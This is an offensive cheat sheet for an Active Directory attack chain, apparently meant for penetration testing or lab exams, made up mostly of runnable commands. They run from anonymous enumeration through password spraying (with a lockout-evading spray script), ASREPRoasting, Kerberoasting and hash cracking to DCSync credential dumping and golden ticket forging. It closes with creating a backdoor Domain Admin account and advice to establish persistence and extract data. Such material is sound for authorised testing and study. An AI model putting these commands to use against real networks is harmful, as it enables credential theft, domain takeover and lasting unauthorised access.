Active Directory Attack Chain

Systematic approach to AD compromise using individual service templates

Environment Setup

export IP=10.10.10.10
export DOMAIN=domain.local
export DC_IP=$IP
export BASE_DN="DC=domain,DC=local"

Phase 1: Initial AD Discovery

Identify Domain Environment

# Check if target is a domain controller: 88 (Kerberos) together with 389/636 (LDAP/LDAPS)
# and 3268/3269 (global catalog) is the DC signature; 53 and 445 normally accompany it
nmap -p 53,88,135,139,389,445,464,593,636,3268,3269 $IP

# Domain name discovery (reverse DNS only works if a PTR record exists)
nslookup $IP
dig -x $IP
# The LDAP RootDSE answers anonymously and reveals the naming contexts (the domain DN)
ldapsearch -x -H ldap://$IP -s base -b "" namingContexts defaultNamingContext

# NetBIOS name discovery
nbtscan $IP
nmblookup -A $IP

Determine Attack Priority

Based on discovered services, follow this attack chain:

Priority 1: Anonymous/Null Access

Priority 2: Authentication Required

Phase 2: Anonymous Enumeration Chain

Step 1: LDAP Anonymous Bind

# Test anonymous LDAP access first
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(objectClass=*)" | head -20

# If successful, extract critical info (-LLL drops comment/version lines; awk keeps only the
# attribute value, whereas "cut -d: -f2" leaves a leading space in every line). The person/user
# filter excludes computer accounts, which also carry objectClass=user
ldapsearch -x -LLL -H ldap://$IP -b "$BASE_DN" "(&(objectCategory=person)(objectClass=user))" sAMAccountName | awk '/^sAMAccountName: /{print $2}' | sort -u > users.txt
ldapsearch -x -LLL -H ldap://$IP -b "$BASE_DN" "(objectClass=computer)" dNSHostName | awk '/^dNSHostName: /{print $2}' | sort -u > computers.txt
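Added example, not part of the original cheat sheet: a small LDIF value extractor for the step above. The grep/cut one-liners break on two things ldapsearch does routinely: it folds values longer than 76 columns onto a continuation line that starts with a single space, and it base64-encodes any value with non-ASCII bytes or leading/trailing spaces after a double colon ("attr:: ..."), which grep/cut then turns into an empty line. The sample LDIF is constructed to exercise both cases; the user, host and domain names in it are placeholders.

```shell
#!/usr/bin/env bash
# ldif_attr ATTR: read ldapsearch output on stdin, print every value of ATTR,
# re-joining folded lines and decoding base64 ("::") values.
ldif_attr() {
    awk -v attr="$1" '
        function emit(line,   val, cmd) {
            if (index(line, attr ":: ") == 1) {
                # base64-encoded value: decode it through the shell
                val = substr(line, length(attr) + 4)
                cmd = "printf %s \"" val "\" | base64 -d"
                cmd | getline val
                close(cmd)
                print val
            } else if (index(line, attr ": ") == 1) {
                print substr(line, length(attr) + 3)
            }
        }
        /^ /  { buf = buf substr($0, 2); next }   # continuation line: append to previous
        { if (buf != "") emit(buf); buf = $0 }    # any other line: flush the previous one
        END   { if (buf != "") emit(buf) }
    '
}

# Constructed sample of "ldapsearch -x -LLL ..." output (placeholder data, not a real
# directory): a plain value, a base64 value containing a non-ASCII character (mueller
# with an umlaut), and a dNSHostName folded across two lines.
SAMPLE_LDIF='dn: CN=John Doe,CN=Users,DC=domain,DC=local
sAMAccountName: jdoe

dn: CN=Hans Mueller,CN=Users,DC=domain,DC=local
sAMAccountName:: bcO8bGxlcg==

dn: CN=WS01,CN=Computers,DC=domain,DC=local
sAMAccountName: WS01$
dNSHostName: ws01.dom
 ain.local
'

printf '%s' "$SAMPLE_LDIF" | ldif_attr sAMAccountName   # jdoe, müller, WS01$
printf '%s' "$SAMPLE_LDIF" | ldif_attr dNSHostName      # ws01.domain.local

# Real use, in place of the grep/cut pipelines:
#   ldapsearch -x -LLL -H ldap://$IP -b "$BASE_DN" "(&(objectCategory=person)(objectClass=user))" sAMAccountName \
#       | ldif_attr sAMAccountName | sort -u > users.txt
```

Attribute names are matched exactly as the server echoes them (sAMAccountName, dNSHostName), which is how ldapsearch prints them for AD; pipe through sort -u before spraying so each user is tried once.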

Step 2: SMB Null Sessions

# Test SMB null sessions
netexec smb $IP -u '' -p '' --shares
netexec smb $IP -u 'guest' -p '' --shares

# If successful, enumerate further
enum4linux-ng -A $IP

Step 3: RPC Null Sessions

# Test RPC anonymous access (-c runs the commands without an interactive prompt)
rpcclient -U "" -N $IP -c "enumdomusers;enumdomgroups;querydominfo"

Phase 3: Credential-Based Attacks

Password Spraying Campaign

Using discovered usernames from Phase 2:

# Check the lockout policy before spraying: the threshold and the observation window
# decide how many passwords per user are safe (this often works over a null session)
netexec smb $IP -u '' -p '' --pass-pol

# Common AD passwords to test
echo "Password123!" > passwords.txt
echo "Welcome123!" >> passwords.txt
echo "Summer2024!" >> passwords.txt
echo "Spring2024!" >> passwords.txt
echo "company2024!" >> passwords.txt

# Spray across multiple protocols. A 5-entry list means 5 attempts per user per run:
# only safe when --pass-pol reports no lockout or a threshold above that; otherwise
# spray one password at a time and wait out the observation window between rounds
netexec smb $IP -u users.txt -p passwords.txt --continue-on-success
netexec ldap $IP -u users.txt -p passwords.txt --continue-on-success
netexec winrm $IP -u users.txt -p passwords.txt --continue-on-success
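Added example, not part of the original cheat sheet: a lockout-aware wrapper for the spraying step above. It takes the threshold and observation window that netexec's --pass-pol reports, sends at most (threshold - margin) passwords per round and sleeps a full window before the next round, so no account ever accumulates enough bad attempts to lock. The netexec invocation inside spray_one is the same one used on this page; DRY_RUN and the margin parameter are conventions of this example, not netexec options.

```shell
#!/usr/bin/env bash
# spray_one PASSWORD ROUND: one pass over users.txt with a single password.
# With DRY_RUN set it only prints what it would do, which is how the pacing
# logic can be checked without a target.
spray_one() {
    if [ -n "$DRY_RUN" ]; then echo "round $2: $1"; return 0; fi
    netexec smb "$IP" -u users.txt -p "$1" --continue-on-success
}

# spray_run THRESHOLD MARGIN WINDOW_MINUTES PASSWORD_FILE
# THRESHOLD and WINDOW_MINUTES come from "netexec smb $IP --pass-pol"
# (lockout threshold / observation window). MARGIN is the number of attempts
# left unused per window, to absorb a user's own typos or a parallel scan.
# THRESHOLD 0 means "no lockout" (netexec prints "None"), so everything is sent at once.
spray_run() {
    local threshold="$1" margin="$2" window="$3" pwfile="$4"
    local per_round n=0 round=1 pw
    if [ "$threshold" -eq 0 ]; then
        per_round=1000000
    else
        per_round=$(( threshold - margin ))
    fi
    if [ "$per_round" -lt 1 ]; then
        echo "[!] threshold $threshold minus margin $margin leaves no safe attempts" >&2
        return 1
    fi
    while IFS= read -r pw || [ -n "$pw" ]; do
        [ -n "$pw" ] || continue                  # skip blank lines in the list
        if [ "$n" -eq "$per_round" ]; then
            echo "[*] round $round done; sleeping ${window}m for the observation window to reset" >&2
            sleep $(( window * 60 ))
            n=0; round=$(( round + 1 ))
        fi
        spray_one "$pw" "$round"
        n=$(( n + 1 ))
    done < "$pwfile"
}

# Usage for a policy of "threshold 5, observation window 30 minutes":
#   spray_run 5 2 30 passwords.txt
# Dry run to see the round boundaries without touching the network:
#   DRY_RUN=1 spray_run 5 2 30 passwords.txt
```

Keep the margin at 2 or more: the DC counts failed attempts from every source, so another tester or a stale mapped drive spends attempts from the same budget.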

Kerberos Pre-Authentication Attacks

# ASREPRoast (no credentials required; -format hashcat writes lines hashcat mode 18200 accepts)
impacket-GetNPUsers $DOMAIN/ -dc-ip $DC_IP -no-pass -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt

# If ASREPRoastable users found (18200 = AS-REP with etype 23/RC4)
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt

Phase 4: Authenticated Enumeration

Once you have valid credentials (user:password):

Enhanced Domain Enumeration

# Set credentials for reuse
export CREDS="username:password"

# Comprehensive LDAP enumeration
netexec ldap $IP -u username -p password --users --groups --computers
# Password policy (lockout threshold and observation window) comes from the smb module
netexec smb $IP -u username -p password --pass-pol

# Kerberoasting (requests a service ticket for every account that has an SPN)
impacket-GetUserSPNs $DOMAIN/$CREDS -dc-ip $DC_IP -request -outputfile kerb_hashes.txt
netexec ldap $IP -u username -p password --kerberoasting kerb_hashes.txt

BloodHound Data Collection

# Collect AD data for analysis (-ns sends DNS lookups to the DC so the domain resolves
# from a non-joined host; --zip bundles the JSON for upload)
bloodhound-python -d $DOMAIN -u username -p password -ns $DC_IP -c all --zip

# Alternative: SharpHound on target
# Transfer SharpHound.exe to target, then run in PowerShell ($DOMAIN is a bash variable, so spell the domain out):
# .\SharpHound.exe -c All -d domain.local

Phase 5: Lateral Movement

WinRM Access Testing

# Test WinRM with discovered credentials (-u takes the username only, not user:password)
netexec winrm $IP -u username -p password
evil-winrm -i $IP -u username -p password

Pass-the-Hash Preparation

# If you obtain NTLM hashes, test across domain
netexec smb $IP -u username -H ntlm_hash
netexec winrm $IP -u username -H ntlm_hash

Service Account Exploitation

# If Kerberoastable service accounts found (13100 = TGS-REP with etype 23/RC4;
# AES tickets, prefix $krb5tgs$17$/$18$, need modes 19600/19700 instead)
hashcat -m 13100 kerb_hashes.txt /usr/share/wordlists/rockyou.txt

# Test cracked service account credentials
netexec smb $IP -u service_account -p cracked_password --shares
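Added example, not part of the original cheat sheet, serving both the ASREPRoast and the Kerberoast cracking steps: hashcat's mode is decided by the encryption type embedded in the hash prefix, an AES ticket fed to -m 13100 is rejected with a format error, and hashcat will not load a file that mixes modes. The function below sorts a combined hash file into one file per mode and prints the matching hashcat command lines. The sample hashes are constructed and truncated (placeholder accounts and hosts under domain.local), not real ticket material.

```shell
#!/usr/bin/env bash
# Prefix -> hashcat mode:
#   $krb5asrep$23$          AS-REP,  RC4      -> 18200
#   $krb5asrep$17$ / $18$   AS-REP,  AES      -> 32100 (hashcat 6.2.6 or newer)
#   $krb5tgs$23$            TGS-REP, RC4      -> 13100
#   $krb5tgs$17$            TGS-REP, AES-128  -> 19600
#   $krb5tgs$18$            TGS-REP, AES-256  -> 19700
krb_hash_mode() {
    case "$1" in
        '$krb5asrep$23$'*)                    echo 18200 ;;
        '$krb5asrep$17$'*|'$krb5asrep$18$'*)  echo 32100 ;;
        '$krb5tgs$23$'*)                      echo 13100 ;;
        '$krb5tgs$17$'*)                      echo 19600 ;;
        '$krb5tgs$18$'*)                      echo 19700 ;;
        *) return 1 ;;
    esac
}

# split_krb_hashes INPUT OUTDIR: write OUTDIR/<mode>.hash per mode and print one
# hashcat command per file. OUTDIR is treated as owned by this function.
split_krb_hashes() {
    local in="$1" out="$2" line mode f
    mkdir -p "$out" && rm -f "$out"/*.hash
    while IFS= read -r line || [ -n "$line" ]; do
        [ -n "$line" ] || continue
        if mode=$(krb_hash_mode "$line"); then
            printf '%s\n' "$line" >> "$out/$mode.hash"
        else
            printf '[!] unrecognised hash skipped: %.40s...\n' "$line" >&2
        fi
    done < "$in"
    for f in "$out"/*.hash; do
        [ -e "$f" ] || continue
        mode=${f##*/}; mode=${mode%.hash}
        echo "hashcat -m $mode $f /usr/share/wordlists/rockyou.txt"
    done
}

# Constructed, truncated sample (not real hashes): an RC4 AS-REP, an RC4 TGS-REP and
# an AES-256 TGS-REP in the shape GetNPUsers/GetUserSPNs -outputfile produce.
SAMPLE_HASHES=$(mktemp)
cat > "$SAMPLE_HASHES" <<'EOF'
$krb5asrep$23$jdoe@DOMAIN.LOCAL:0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff
$krb5tgs$23$*svc_sql$DOMAIN.LOCAL$MSSQLSvc/sql01.domain.local:1433*$0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff
$krb5tgs$18$svc_web$DOMAIN.LOCAL$*HTTP/web01.domain.local*$0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff
EOF

# Real use: cat asrep_hashes.txt kerb_hashes.txt > all.hash; split_krb_hashes all.hash cracking/
split_krb_hashes "$SAMPLE_HASHES" "$(mktemp -d)"
```

AES-only tickets are what you get when the service account has RC4 disabled (msDS-SupportedEncryptionTypes without RC4); they crack far slower, so prioritise the 13100/18200 files.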

Phase 6: Domain Privilege Escalation

High-Value Target Identification

From BloodHound analysis, look for:

  • Users with DCSync rights
  • Computers with unconstrained delegation
  • Service accounts with admin privileges
  • Shortest path to Domain Admins

Common Escalation Vectors

Unconstrained Delegation

# List computers (and users) flagged TRUSTED_FOR_DELEGATION
netexec ldap $IP -u username -p password --trusted-for-delegation
# If a computer you control has unconstrained delegation:
# force a privileged principal to authenticate to it, then
# extract the TGT it caches for privilege escalation

Weak ACLs

# Look for users with GenericAll/WriteDacl on high-value objects
# Use PowerView or BloodHound to identify paths

Group Policy Abuse

# Check for GPP passwords (older domains): search SYSVOL remotely, or decode a Groups.xml already pulled down
impacket-Get-GPPPassword $DOMAIN/$CREDS@$DC_IP
impacket-Get-GPPPassword -xmlfile Groups.xml LOCAL

# Look for writable GPO paths

Phase 7: Domain Compromise

Domain Admin Access

Once you achieve Domain Admin equivalent access:

# Verify domain admin privileges (run from a shell on a domain-joined Windows host)
net group "Domain Admins" /domain

# Extract domain hashes via DCSync (-just-dc limits output to NTDS secrets)
impacket-secretsdump $DOMAIN/$CREDS@$DC_IP -just-dc

# Golden ticket creation (if krbtgt hash obtained); the domain SID is in the secretsdump
# output or from "netexec ldap $IP -u username -p password --get-sid"
impacket-ticketer -nthash krbtgt_hash -domain $DOMAIN -domain-sid domain_sid administrator
export KRB5CCNAME=administrator.ccache   # ticketer writes <user>.ccache; impacket tools pick it up with -k

Persistence Mechanisms

# Create persistent domain admin access
net user backdoor P@ssw0rd123 /add /domain
net group "Domain Admins" backdoor /add /domain

# Golden ticket persistence
# DCSync persistence via AdminSDHolder

Attack Chain Decision Tree

If Anonymous Access Succeeds

  1. Extract all users/computers from LDAP
  2. Test password spraying immediately
  3. Check for ASREPRoastable users
  4. Proceed to authenticated phase

If Anonymous Access Fails

  1. Focus on Kerberos attacks (ASREPRoast with guessed usernames)
  2. Test default credentials on discovered services
  3. Look for other attack vectors (web apps, other services)

If Password Spraying Succeeds

  1. Immediately run BloodHound collection
  2. Test for Kerberoastable accounts
  3. Check WinRM access for shell
  4. Analyze attack paths with BloodHound

If Service Account Compromised

  1. Check for admin privileges on other systems
  2. Look for delegation opportunities
  3. Test for SPN permissions abuse

Common AD Attack Combinations

LDAP → Kerberos → WinRM Chain

# 1. Anonymous LDAP enumeration
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(objectClass=user)" sAMAccountName

# 2. ASREPRoast discovered users
impacket-GetNPUsers $DOMAIN/ -dc-ip $DC_IP -no-pass -usersfile users.txt -format hashcat -outputfile asrep.hash

# 3. Crack hashes and test WinRM
hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt
evil-winrm -i $IP -u user -p cracked_password

SMB → RPC → Lateral Movement

# 1. SMB null session enumeration
netexec smb $IP -u '' -p '' --shares --users

# 2. RPC enumeration for additional users
rpcclient -U "" -N $IP -c "enumdomusers"

# 3. Password spray and lateral movement across the subnet (e.g. the /24 of $IP)
netexec smb subnet_range -u users.txt -p passwords.txt --continue-on-success

Time Management for AD Attacks

First 30 Minutes

  • Anonymous enumeration across all AD services
  • User list compilation from multiple sources
  • Password spraying with top 5 common passwords

Next 30 Minutes

  • ASREPRoasting discovered users
  • Kerberoasting if credentials obtained
  • BloodHound collection if authenticated

Ongoing

  • Hash cracking in background
  • Lateral movement testing
  • Privilege escalation path analysis

Success Indicators

Low Privilege Success

  • Valid domain credentials obtained
  • WinRM/RDP access to domain system
  • BloodHound data collected

High Privilege Success

  • Service account with elevated privileges
  • Local admin on domain controller
  • Domain admin equivalent access

Next Steps After AD Compromise

  1. Document all credentials and access
  2. Establish persistence via multiple methods
  3. Pivot to other network segments
  4. Extract sensitive data systematically

Resources